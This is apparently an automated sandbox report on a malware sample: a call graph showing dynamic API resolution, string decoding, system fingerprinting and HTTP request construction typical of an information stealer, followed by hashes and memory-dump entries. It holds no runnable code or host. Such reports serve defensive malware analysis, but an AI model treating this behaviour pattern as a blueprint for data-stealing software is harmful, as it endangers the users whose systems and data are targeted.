26633 393aff 26632->26633 26634 394a60 2 API calls 26633->26634 26635 393b15 26634->26635 26636 394a60 2 API calls 26635->26636 26637 393b2b 26636->26637 26638 394a60 2 API calls 26637->26638 26639 393b44 26638->26639 26640 394a60 2 API calls 26639->26640 26641 393b5a 26640->26641 26642 394a60 2 API calls 26641->26642 26643 393b70 26642->26643 26644 394a60 2 API calls 26643->26644 26645 393b86 26644->26645 26646 394a60 2 API calls 26645->26646 26647 393b9c 26646->26647 26648 394a60 2 API calls 26647->26648 26649 393bb2 26648->26649 26650 394a60 2 API calls 26649->26650 26651 393bcb 26650->26651 26652 394a60 2 API calls 26651->26652 26653 393be1 26652->26653 26654 394a60 2 API calls 26653->26654 26655 393bf7 26654->26655 26656 394a60 2 API calls 26655->26656 26657 393c0d 26656->26657 26658 394a60 2 API calls 26657->26658 26659 393c23 26658->26659 26660 394a60 2 API calls 26659->26660 26661 393c39 26660->26661 26662 394a60 2 API calls 26661->26662 26663 393c52 26662->26663 26664 394a60 2 API calls 26663->26664 26665 393c68 26664->26665 26666 394a60 2 API calls 26665->26666 26667 393c7e 26666->26667 26668 394a60 2 API calls 26667->26668 26669 393c94 26668->26669 26670 394a60 2 API calls 26669->26670 26671 393caa 26670->26671 26672 394a60 2 API calls 26671->26672 26673 393cc0 26672->26673 26674 394a60 2 API calls 26673->26674 26675 393cd9 26674->26675 26676 394a60 2 API calls 26675->26676 26677 393cef 26676->26677 26678 394a60 2 API calls 26677->26678 26679 393d05 26678->26679 26680 394a60 2 API calls 26679->26680 26681 393d1b 26680->26681 26682 394a60 2 API calls 26681->26682 26683 393d31 26682->26683 26684 394a60 2 API calls 26683->26684 26685 393d47 26684->26685 26686 394a60 2 API calls 26685->26686 26687 393d60 26686->26687 26688 394a60 2 API calls 26687->26688 26689 393d76 26688->26689 26690 394a60 2 API calls 26689->26690 26691 393d8c 26690->26691 26692 394a60 2 API calls 26691->26692 26693 393da2 26692->26693 26694 394a60 2 API calls 26693->26694 26695 393db8 26694->26695 26696 394a60 2 API calls 26695->26696 26697 393dce 26696->26697 26698 394a60 2 API calls 26697->26698 26699 393de7 26698->26699 26700 394a60 2 API calls 26699->26700 26701 393dfd 26700->26701 26702 394a60 2 API calls 26701->26702 26703 393e13 26702->26703 26704 394a60 2 API calls 26703->26704 26705 393e29 26704->26705 26706 394a60 2 API calls 26705->26706 26707 393e3f 26706->26707 26708 394a60 2 API calls 26707->26708 26709 393e55 26708->26709 26710 394a60 2 API calls 26709->26710 26711 393e6e 26710->26711 26712 394a60 2 API calls 26711->26712 26713 393e84 26712->26713 26714 394a60 2 API calls 26713->26714 26715 393e9a 26714->26715 26716 394a60 2 API calls 26715->26716 26717 393eb0 26716->26717 26718 394a60 2 API calls 26717->26718 26719 393ec6 26718->26719 26720 394a60 2 API calls 26719->26720 26721 393edc 26720->26721 26722 394a60 2 API calls 26721->26722 26723 393ef5 26722->26723 26724 394a60 2 API calls 26723->26724 26725 393f0b 26724->26725 26726 394a60 2 API calls 26725->26726 26727 393f21 26726->26727 26728 394a60 2 API calls 26727->26728 26729 393f37 26728->26729 26730 394a60 2 API calls 26729->26730 26731 393f4d 26730->26731 26732 394a60 2 API calls 26731->26732 26733 393f63 26732->26733 26734 394a60 2 API calls 26733->26734 26735 393f7c 26734->26735 26736 394a60 2 API calls 26735->26736 26737 393f92 26736->26737 26738 394a60 2 API calls 26737->26738 26739 393fa8 26738->26739 26740 394a60 2 API calls 26739->26740 26741 393fbe 26740->26741 26742 394a60 2 API calls 26741->26742 26743 393fd4 26742->26743 26744 394a60 2 API calls 26743->26744 26745 393fea 26744->26745 26746 394a60 2 API calls 26745->26746 26747 394003 26746->26747 26748 394a60 2 API calls 26747->26748 26749 394019 26748->26749 26750 394a60 2 API calls 26749->26750 26751 39402f 26750->26751 26752 394a60 2 API calls 26751->26752 26753 394045 26752->26753 26754 394a60 2 API calls 26753->26754 26755 39405b 26754->26755 26756 394a60 2 API calls 26755->26756 26757 394071 26756->26757 26758 394a60 2 API calls 26757->26758 26759 39408a 26758->26759 26760 394a60 2 API calls 26759->26760 26761 3940a0 26760->26761 26762 394a60 2 API calls 26761->26762 26763 3940b6 26762->26763 26764 394a60 2 API calls 26763->26764 26765 3940cc 26764->26765 26766 394a60 2 API calls 26765->26766 26767 3940e2 26766->26767 26768 394a60 2 API calls 26767->26768 26769 3940f8 26768->26769 26770 394a60 2 API calls 26769->26770 26771 394111 26770->26771 26772 394a60 2 API calls 26771->26772 26773 394127 26772->26773 26774 394a60 2 API calls 26773->26774 26775 39413d 26774->26775 26776 394a60 2 API calls 26775->26776 26777 394153 26776->26777 26778 394a60 2 API calls 26777->26778 26779 394169 26778->26779 26780 394a60 2 API calls 26779->26780 26781 39417f 26780->26781 26782 394a60 2 API calls 26781->26782 26783 394198 26782->26783 26784 394a60 2 API calls 26783->26784 26785 3941ae 26784->26785 26786 394a60 2 API calls 26785->26786 26787 3941c4 26786->26787 26788 394a60 2 API calls 26787->26788 26789 3941da 26788->26789 26790 394a60 2 API calls 26789->26790 26791 3941f0 26790->26791 26792 394a60 2 API calls 26791->26792 26793 394206 26792->26793 26794 394a60 2 API calls 26793->26794 26795 39421f 26794->26795 26796 394a60 2 API calls 26795->26796 26797 394235 26796->26797 26798 394a60 2 API calls 26797->26798 26799 39424b 26798->26799 26800 394a60 2 API calls 26799->26800 26801 394261 26800->26801 26802 394a60 2 API calls 26801->26802 26803 394277 26802->26803 26804 394a60 2 API calls 26803->26804 26805 39428d 26804->26805 26806 394a60 2 API calls 26805->26806 26807 3942a6 26806->26807 26808 394a60 2 API calls 26807->26808 26809 3942bc 26808->26809 26810 394a60 2 API calls 26809->26810 26811 3942d2 26810->26811 26812 394a60 2 API calls 26811->26812 26813 3942e8 26812->26813 26814 394a60 2 API calls 26813->26814 26815 3942fe 26814->26815 26816 394a60 2 API calls 26815->26816 26817 394314 26816->26817 26818 394a60 2 API calls 26817->26818 26819 39432d 26818->26819 26820 394a60 2 API calls 26819->26820 26821 394343 26820->26821 26822 394a60 2 API calls 26821->26822 26823 394359 26822->26823 26824 394a60 2 API calls 26823->26824 26825 39436f 26824->26825 26826 394a60 2 API calls 26825->26826 26827 394385 26826->26827 26828 394a60 2 API calls 26827->26828 26829 39439b 26828->26829 26830 394a60 2 API calls 26829->26830 26831 3943b4 26830->26831 26832 394a60 2 API calls 26831->26832 26833 3943ca 26832->26833 26834 394a60 2 API calls 26833->26834 26835 3943e0 26834->26835 26836 394a60 2 API calls 26835->26836 26837 3943f6 26836->26837 26838 394a60 2 API calls 26837->26838 26839 39440c 26838->26839 26840 394a60 2 API calls 26839->26840 26841 394422 26840->26841 26842 394a60 2 API calls 26841->26842 26843 39443b 26842->26843 26844 394a60 2 API calls 26843->26844 26845 394451 26844->26845 26846 394a60 2 API calls 26845->26846 26847 394467 26846->26847 26848 394a60 2 API calls 26847->26848 26849 39447d 26848->26849 26850 394a60 2 API calls 26849->26850 26851 394493 26850->26851 26852 394a60 2 API calls 26851->26852 26853 3944a9 26852->26853 26854 394a60 2 API calls 26853->26854 26855 3944c2 26854->26855 26856 394a60 2 API calls 26855->26856 26857 3944d8 26856->26857 26858 394a60 2 API calls 26857->26858 26859 3944ee 26858->26859 26860 394a60 2 API calls 26859->26860 26861 394504 26860->26861 26862 394a60 2 API calls 26861->26862 26863 39451a 26862->26863 26864 394a60 2 API calls 26863->26864 26865 394530 26864->26865 26866 394a60 2 API calls 26865->26866 26867 394549 26866->26867 26868 394a60 2 API calls 26867->26868 26869 39455f 26868->26869 26870 394a60 2 API calls 26869->26870 26871 394575 26870->26871 26872 394a60 2 API calls 26871->26872 26873 39458b 26872->26873 26874 394a60 2 API calls 26873->26874 26875 3945a1 26874->26875 26876 394a60 2 API calls 26875->26876 26877 3945b7 26876->26877 26878 394a60 2 API calls 26877->26878 26879 3945d0 26878->26879 26880 394a60 2 API calls 26879->26880 26881 3945e6 26880->26881 26882 394a60 2 API calls 26881->26882 26883 3945fc 26882->26883 26884 394a60 2 API calls 26883->26884 26885 394612 26884->26885 26886 394a60 2 API calls 26885->26886 26887 394628 26886->26887 26888 394a60 2 API calls 26887->26888 26889 39463e 26888->26889 26890 394a60 2 API calls 26889->26890 26891 394657 26890->26891 26892 394a60 2 API calls 26891->26892 26893 39466d 26892->26893 26894 394a60 2 API calls 26893->26894 26895 394683 26894->26895 26896 394a60 2 API calls 26895->26896 26897 394699 26896->26897 26898 394a60 2 API calls 26897->26898 26899 3946af 26898->26899 26900 394a60 2 API calls 26899->26900 26901 3946c5 26900->26901 26902 394a60 2 API calls 26901->26902 26903 3946de 26902->26903 26904 394a60 2 API calls 26903->26904 26905 3946f4 26904->26905 26906 394a60 2 API calls 26905->26906 26907 39470a 26906->26907 26908 394a60 2 API calls 26907->26908 26909 394720 26908->26909 26910 394a60 2 API calls 26909->26910 26911 394736 26910->26911 26912 394a60 2 API calls 26911->26912 26913 39474c 26912->26913 26914 394a60 2 API calls 26913->26914 26915 394765 26914->26915 26916 394a60 2 API calls 26915->26916 26917 39477b 26916->26917 26918 394a60 2 API calls 26917->26918 26919 394791 26918->26919 26920 394a60 2 API calls 26919->26920 26921 3947a7 26920->26921 26922 394a60 2 API calls 26921->26922 26923 3947bd 26922->26923 26924 394a60 2 API calls 26923->26924 26925 3947d3 26924->26925 26926 394a60 2 API calls 26925->26926 26927 3947ec 26926->26927 26928 394a60 2 API calls 26927->26928 26929 394802 26928->26929 26930 394a60 2 API calls 26929->26930 26931 394818 26930->26931 26932 394a60 2 API calls 26931->26932 26933 39482e 26932->26933 26934 394a60 2 API calls 26933->26934 26935 394844 26934->26935 26936 394a60 2 API calls 26935->26936 26937 39485a 26936->26937 26938 394a60 2 API calls 26937->26938 26939 394873 26938->26939 26940 394a60 2 API calls 26939->26940 26941 394889 26940->26941 26942 394a60 2 API calls 26941->26942 26943 39489f 26942->26943 26944 394a60 2 API calls 26943->26944 26945 3948b5 26944->26945 26946 394a60 2 API calls 26945->26946 26947 3948cb 26946->26947 26948 394a60 2 API calls 26947->26948 26949 3948e1 26948->26949 26950 394a60 2 API calls 26949->26950 26951 3948fa 26950->26951 26952 394a60 2 API calls 26951->26952 26953 394910 26952->26953 26954 394a60 2 API calls 26953->26954 26955 394926 26954->26955 26956 394a60 2 API calls 26955->26956 26957 39493c 26956->26957 26958 394a60 2 API calls 26957->26958 26959 394952 26958->26959 26960 394a60 2 API calls 26959->26960 26961 394968 26960->26961 26962 394a60 2 API calls 26961->26962 26963 394981 26962->26963 26964 394a60 2 API calls 26963->26964 26965 394997 26964->26965 26966 394a60 2 API calls 26965->26966 26967 3949ad 26966->26967 26968 394a60 2 API calls 26967->26968 26969 3949c3 26968->26969 26970 394a60 2 API calls 26969->26970 26971 3949d9 26970->26971 26972 394a60 2 API calls 26971->26972 26973 3949ef 26972->26973 26974 394a60 2 API calls 26973->26974 26975 394a08 26974->26975 26976 394a60 2 API calls 26975->26976 26977 394a1e 26976->26977 26978 394a60 2 API calls 26977->26978 26979 394a34 26978->26979 26980 394a60 2 API calls 26979->26980 26981 394a4a 26980->26981 26982 3b66e0 26981->26982 26983 3b6afe 8 API calls 26982->26983 26984 3b66ed 43 API calls 26982->26984 26985 3b6c08 26983->26985 26986 3b6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26983->26986 26984->26983 26987 3b6cd2 26985->26987 26988 3b6c15 8 API calls 26985->26988 26986->26985 26989 3b6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26987->26989 26990 3b6d4f 26987->26990 26988->26987 26989->26990 26991 3b6de9 26990->26991 26992 3b6d5c 6 API calls 26990->26992 26993 3b6f10 26991->26993 26994 3b6df6 12 API calls 26991->26994 26992->26991 26995 3b6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 26993->26995 26996 3b6f8d 26993->26996 26994->26993 26995->26996 26997 3b6fc1 26996->26997 26998 3b6f96 GetProcAddress GetProcAddress 26996->26998 26999 3b6fca GetProcAddress GetProcAddress 26997->26999 27000 3b6ff5 26997->27000 26998->26997 26999->27000 27001 3b70ed 27000->27001 27002 3b7002 10 API calls 27000->27002 27003 3b7152 27001->27003 27004 3b70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27001->27004 27002->27001 27005 3b715b GetProcAddress 27003->27005 27006 3b716e 27003->27006 27004->27003 27005->27006 27007 3b051f 27006->27007 27008 3b7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27006->27008 27009 391530 27007->27009 27008->27007 27318 391610 27009->27318 27011 39153b 27012 391555 lstrcpy 27011->27012 27013 39155d 27011->27013 27012->27013 27014 391577 lstrcpy 27013->27014 27015 39157f 27013->27015 27014->27015 27016 391599 lstrcpy 27015->27016 27018 3915a1 27015->27018 27016->27018 27017 391605 27020 3af1b0 lstrlen 27017->27020 27018->27017 27019 3915fd lstrcpy 27018->27019 27019->27017 27021 3af1e4 27020->27021 27022 3af1eb lstrcpy 27021->27022 27023 3af1f7 lstrlen 27021->27023 27022->27023 27024 3af208 27023->27024 27025 3af21b lstrlen 27024->27025 27026 3af20f lstrcpy 27024->27026 27027 3af22c 27025->27027 27026->27025 27028 3af233 lstrcpy 27027->27028 27029 3af23f 27027->27029 27028->27029 27030 3af258 lstrcpy 27029->27030 27031 3af264 27029->27031 27030->27031 27032 3af286 lstrcpy 27031->27032 27033 3af292 27031->27033 27032->27033 27034 3af2ba lstrcpy 27033->27034 27035 3af2c6 27033->27035 27034->27035 27036 3af2ea lstrcpy 27035->27036 27097 3af300 27035->27097 27036->27097 27037 3af30c lstrlen 27037->27097 27038 3af4b9 lstrcpy 27038->27097 27039 3af3a1 lstrcpy 27039->27097 27040 3af3c5 lstrcpy 27040->27097 27041 3af4e8 lstrcpy 27102 3af4f0 27041->27102 27042 3aefb0 35 API calls 27042->27102 27043 3af479 lstrcpy 27043->27097 27044 3af59c lstrcpy 27044->27102 27045 3af616 StrCmpCA 27046 3af70f StrCmpCA 27045->27046 27045->27102 27050 3afe8e 27046->27050 27046->27097 27047 3afa29 StrCmpCA 27058 3afe2b 27047->27058 27047->27097 27048 3af73e lstrlen 27048->27097 27049 3afead lstrlen 27064 3afec7 27049->27064 27050->27049 27056 3afea5 lstrcpy 27050->27056 27051 3afd4d StrCmpCA 27054 3afd60 Sleep 27051->27054 27061 3afd75 27051->27061 27052 3af64a lstrcpy 27052->27102 27053 3afa58 lstrlen 27053->27097 27054->27097 27055 391530 8 API calls 27055->27102 27056->27049 27057 3afe4a lstrlen 27071 3afe64 27057->27071 27058->27057 27059 3afe42 lstrcpy 27058->27059 27059->27057 27060 3af89e lstrcpy 27060->27097 27062 3afd94 lstrlen 27061->27062 27066 3afd8c lstrcpy 27061->27066 27073 3afdae 27062->27073 27063 3af76f lstrcpy 27063->27097 27065 3afee7 lstrlen 27064->27065 27068 3afedf lstrcpy 27064->27068 27069 3aff01 27065->27069 27066->27062 27067 3afbb8 lstrcpy 27067->27097 27068->27065 27079 3aff21 27069->27079 27080 3aff19 lstrcpy 27069->27080 27070 3afa89 lstrcpy 27070->27097 27072 3afdce lstrlen 27071->27072 27074 3afe7c lstrcpy 27071->27074 27086 3afde8 27072->27086 27073->27072 27084 3afdc6 lstrcpy 27073->27084 27074->27072 27075 3af791 lstrcpy 27075->27097 27077 391530 8 API calls 27077->27097 27078 3af8cd lstrcpy 27078->27102 27081 391610 4 API calls 27079->27081 27080->27079 27104 3afe13 27081->27104 27082 3afaab lstrcpy 27082->27097 27083 3af698 lstrcpy 27083->27102 27084->27072 27085 3afbe7 lstrcpy 27085->27102 27088 3afe08 27086->27088 27089 3afe00 lstrcpy 27086->27089 27087 3aee90 28 API calls 27087->27097 27090 391610 4 API calls 27088->27090 27089->27088 27090->27104 27091 3af7e2 lstrcpy 27091->27097 27092 3af924 lstrcpy 27092->27102 27093 3af99e StrCmpCA 27093->27047 27093->27102 27094 3afafc lstrcpy 27094->27097 27095 3afc3e lstrcpy 27095->27102 27096 3afcb8 StrCmpCA 27096->27051 27096->27102 27097->27037 27097->27038 27097->27039 27097->27040 27097->27041 27097->27043 27097->27046 27097->27047 27097->27048 27097->27051 27097->27053 27097->27060 27097->27063 27097->27067 27097->27070 27097->27075 27097->27077 27097->27078 27097->27082 27097->27085 27097->27087 27097->27091 27097->27094 27097->27102 27098 3af9cb lstrcpy 27098->27102 27099 3afce9 lstrcpy 27099->27102 27100 3aee90 28 API calls 27100->27102 27101 3afa19 lstrcpy 27101->27102 27102->27042 27102->27044 27102->27045 27102->27047 27102->27051 27102->27052 27102->27055 27102->27083 27102->27092 27102->27093 27102->27095 27102->27096 27102->27097 27102->27098 27102->27099 27102->27100 27102->27101 27103 3afd3a lstrcpy 27102->27103 27103->27102 27104->26128 27106 3b278c GetVolumeInformationA 27105->27106 27107 3b2785 27105->27107 27108 3b27ec GetProcessHeap RtlAllocateHeap 27106->27108 27107->27106 27110 3b2822 27108->27110 27111 3b2826 wsprintfA 27108->27111 27328 3b71e0 27110->27328 27111->27110 27115 394c70 27114->27115 27116 394c85 27115->27116 27117 394c7d lstrcpy 27115->27117 27332 394bc0 27116->27332 27117->27116 27119 394c90 27120 394ccc lstrcpy 27119->27120 27121 394cd8 27119->27121 27120->27121 27122 394cff lstrcpy 27121->27122 27123 394d0b 27121->27123 27122->27123 27124 394d2f lstrcpy 27123->27124 27125 394d3b 27123->27125 27124->27125 27126 394d6d lstrcpy 27125->27126 27127 394d79 27125->27127 27126->27127 27128 394dac InternetOpenA StrCmpCA 27127->27128 27129 394da0 lstrcpy 27127->27129 27130 394de0 27128->27130 27129->27128 27131 3954b8 InternetCloseHandle CryptStringToBinaryA 27130->27131 27336 3b3e70 27130->27336 27133 3954e8 LocalAlloc 27131->27133 27148 3955d8 27131->27148 27134 3954ff CryptStringToBinaryA 27133->27134 27133->27148 27135 395529 lstrlen 27134->27135 27136 395517 LocalFree 27134->27136 27137 39553d 27135->27137 27136->27148 27139 395563 lstrlen 27137->27139 27140 395557 lstrcpy 27137->27140 27138 394dfa 27141 394e23 lstrcpy lstrcat 27138->27141 27142 394e38 27138->27142 27144 39557d 27139->27144 27140->27139 27141->27142 27143 394e5a lstrcpy 27142->27143 27145 394e62 27142->27145 27143->27145 27146 39558f lstrcpy lstrcat 27144->27146 27147 3955a2 27144->27147 27149 394e71 lstrlen 27145->27149 27146->27147 27150 3955d1 27147->27150 27152 3955c9 lstrcpy 27147->27152 27148->26157 27151 394e89 27149->27151 27150->27148 27153 394e95 lstrcpy lstrcat 27151->27153 27154 394eac 27151->27154 27152->27150 27153->27154 27155 394ed5 27154->27155 27156 394ecd lstrcpy 27154->27156 27157 394edc lstrlen 27155->27157 27156->27155 27158 394ef2 27157->27158 27159 394efe lstrcpy lstrcat 27158->27159 27160 394f15 27158->27160 27159->27160 27161 394f36 lstrcpy 27160->27161 27162 394f3e 27160->27162 27161->27162 27163 394f65 lstrcpy lstrcat 27162->27163 27164 394f7b 27162->27164 27163->27164 27165 394fa4 27164->27165 27166 394f9c lstrcpy 27164->27166 27167 394fab lstrlen 27165->27167 27166->27165 27168 394fc1 27167->27168 27169 394fcd lstrcpy lstrcat 27168->27169 27170 394fe4 27168->27170 27169->27170 27171 39500d 27170->27171 27172 395005 lstrcpy 27170->27172 27173 395014 lstrlen 27171->27173 27172->27171 27174 39502a 27173->27174 27175 395036 lstrcpy lstrcat 27174->27175 27176 39504d 27174->27176 27175->27176 27177 395079 27176->27177 27178 395071 lstrcpy 27176->27178 27179 395080 lstrlen 27177->27179 27178->27177 27180 39509b 27179->27180 27181 3950ac lstrcpy lstrcat 27180->27181 27182 3950bc 27180->27182 27181->27182 27183 3950da lstrcpy lstrcat 27182->27183 27184 3950ed 27182->27184 27183->27184 27185 39510b lstrcpy 27184->27185 27186 395113 27184->27186 27185->27186 27187 395121 InternetConnectA 27186->27187 27187->27131 27188 395150 HttpOpenRequestA 27187->27188 27189 39518b 27188->27189 27190 3954b1 InternetCloseHandle 27188->27190 27343 3b7310 lstrlen 27189->27343 27190->27131 27194 3951a4 27351 3b72c0 27194->27351 27197 3b7280 lstrcpy 27198 3951c0 27197->27198 27199 3b7310 3 API calls 27198->27199 27200 3951d5 27199->27200 27201 3b7280 lstrcpy 27200->27201 27202 3951de 27201->27202 27203 3b7310 3 API calls 27202->27203 27204 3951f4 27203->27204 27205 3b7280 lstrcpy 27204->27205 27206 3951fd 27205->27206 27207 3b7310 3 API calls 27206->27207 27208 395213 27207->27208 27209 3b7280 lstrcpy 27208->27209 27210 39521c 27209->27210 27211 3b7310 3 API calls 27210->27211 27212 395231 27211->27212 27213 3b7280 lstrcpy 27212->27213 27214 39523a 27213->27214 27215 3b72c0 2 API calls 27214->27215 27216 39524d 27215->27216 27217 3b7280 lstrcpy 27216->27217 27218 395256 27217->27218 27219 3b7310 3 API calls 27218->27219 27220 39526b 27219->27220 27221 3b7280 lstrcpy 27220->27221 27222 395274 27221->27222 27223 3b7310 3 API calls 27222->27223 27224 395289 27223->27224 27225 3b7280 lstrcpy 27224->27225 27226 395292 27225->27226 27227 3b72c0 2 API calls 27226->27227 27228 3952a5 27227->27228 27229 3b7280 lstrcpy 27228->27229 27230 3952ae 27229->27230 27231 3b7310 3 API calls 27230->27231 27232 3952c3 27231->27232 27233 3b7280 lstrcpy 27232->27233 27234 3952cc 27233->27234 27235 3b7310 3 API calls 27234->27235 27236 3952e2 27235->27236 27237 3b7280 lstrcpy 27236->27237 27238 3952eb 27237->27238 27239 3b7310 3 API calls 27238->27239 27240 395301 27239->27240 27241 3b7280 lstrcpy 27240->27241 27242 39530a 27241->27242 27243 3b7310 3 API calls 27242->27243 27244 39531f 27243->27244 27245 3b7280 lstrcpy 27244->27245 27246 395328 27245->27246 27247 3b72c0 2 API calls 27246->27247 27248 39533b 27247->27248 27249 3b7280 lstrcpy 27248->27249 27250 395344 27249->27250 27251 39537c 27250->27251 27252 395370 lstrcpy 27250->27252 27253 3b72c0 2 API calls 27251->27253 27252->27251 27254 39538a 27253->27254 27255 3b72c0 2 API calls 27254->27255 27256 395397 27255->27256 27257 3b7280 lstrcpy 27256->27257 27258 3953a1 27257->27258 27259 3953b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27258->27259 27260 39549c InternetCloseHandle 27259->27260 27264 3953f2 27259->27264 27262 3954ae 27260->27262 27261 3953fd lstrlen 27261->27264 27262->27190 27263 39542e lstrcpy lstrcat 27263->27264 27264->27260 27264->27261 27264->27263 27265 395473 27264->27265 27266 39546b lstrcpy 27264->27266 27267 39547a InternetReadFile 27265->27267 27266->27265 27267->27260 27267->27264 27269 3a8cc6 ExitProcess 27268->27269 27284 3a8ccd 27268->27284 27270 3a8ee2 27270->26159 27271 3a8d5a lstrlen 27271->27284 27272 3a8dbd StrCmpCA 27272->27284 27273 3a8ddd StrCmpCA 27273->27284 27274 3a8dfd StrCmpCA 27274->27284 27275 3a8e1d StrCmpCA 27275->27284 27276 3a8e3d StrCmpCA 27276->27284 27277 3a8d30 lstrlen 27277->27284 27278 3a8e56 StrCmpCA 27278->27284 27279 3a8e88 lstrlen 27279->27284 27280 3a8e6f StrCmpCA 27280->27284 27281 3a8d06 lstrlen 27281->27284 27282 3a8d84 StrCmpCA 27282->27284 27283 3a8da4 StrCmpCA 27283->27284 27284->27270 27284->27271 27284->27272 27284->27273 27284->27274 27284->27275 27284->27276 27284->27277 27284->27278 27284->27279 27284->27280 27284->27281 27284->27282 27284->27283 27285 3a8ebb lstrcpy 27284->27285 27285->27284 27286->26165 27287->26167 27288->26173 27289->26175 27290->26181 27291->26183 27292->26189 27293->26193 27294->26199 27295->26201 27296->26205 27297->26219 27298->26223 27299->26222 27300->26218 27301->26222 27302->26241 27303->26225 27304->26226 27305->26230 27306->26233 27307->26238 27308->26245 27309->26248 27310->26254 27311->26276 27312->26280 27313->26279 27314->26275 27315->26279 27316->26289 27319 39161f 27318->27319 27320 39162b lstrcpy 27319->27320 27321 391633 27319->27321 27320->27321 27322 39164d lstrcpy 27321->27322 27323 391655 27321->27323 27322->27323 27324 39166f lstrcpy 27323->27324 27325 391677 27323->27325 27324->27325 27326 391699 27325->27326 27327 391691 lstrcpy 27325->27327 27326->27011 27327->27326 27329 3b71e6 27328->27329 27330 3b71fc lstrcpy 27329->27330 27331 3b2860 27329->27331 27330->27331 27331->26154 27333 394bd0 27332->27333 27333->27333 27334 394bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27333->27334 27335 394c41 27334->27335 27335->27119 27337 3b3e83 27336->27337 27338 3b3e9f lstrcpy 27337->27338 27339 3b3eab 27337->27339 27338->27339 27340 3b3ecd lstrcpy 27339->27340 27341 3b3ed5 GetSystemTime 27339->27341 27340->27341 27342 3b3ef3 27341->27342 27342->27138 27345 3b732d 27343->27345 27344 39519b 27347 3b7280 27344->27347 27345->27344 27346 3b733d lstrcpy lstrcat 27345->27346 27346->27344 27348 3b728c 27347->27348 27349 3b72b4 27348->27349 27350 3b72ac lstrcpy 27348->27350 27349->27194 27350->27349 27353 3b72dc 27351->27353 27352 3951b7 27352->27197 27353->27352 27354 3b72ed lstrcpy lstrcat 27353->27354 27354->27352 27385 3b31f0 GetSystemInfo wsprintfA 27362 3a4c77 295 API calls 27363 395869 57 API calls 27391 3a1269 408 API calls 27380 3b2d60 11 API calls 27407 3b2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 27408 3ba280 __CxxFrameHandler 27381 3a3959 244 API calls 27386 3a01d9 126 API calls 27364 3b2853 lstrcpy 27376 3b2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27416 3a8615 48 API calls 27365 3ae049 147 API calls 27377 3b3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27417 3b33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27409 3a8615 49 API calls
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00394C7F
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394CD2
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394D05
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394D35
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394D73
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394DA6
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00394DB6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: a2175ba95b15a86119cf78d25b78952a845d4bf7fbf57412bc59da19c10cd6a6
                              • Instruction ID: 1577b475884d1180d8ce6cf3c0527ba31dd9376c58f8dc0b82914a47cd3aba3c
                              • Opcode Fuzzy Hash: a2175ba95b15a86119cf78d25b78952a845d4bf7fbf57412bc59da19c10cd6a6
                              • Instruction Fuzzy Hash: 06524B32911A16AFDF23EBA4DC49EAF77B9AF54300F194424F905AB251DB30ED46CB90

                              Control-flow Graph

                              • Executed
                              • Not Executed
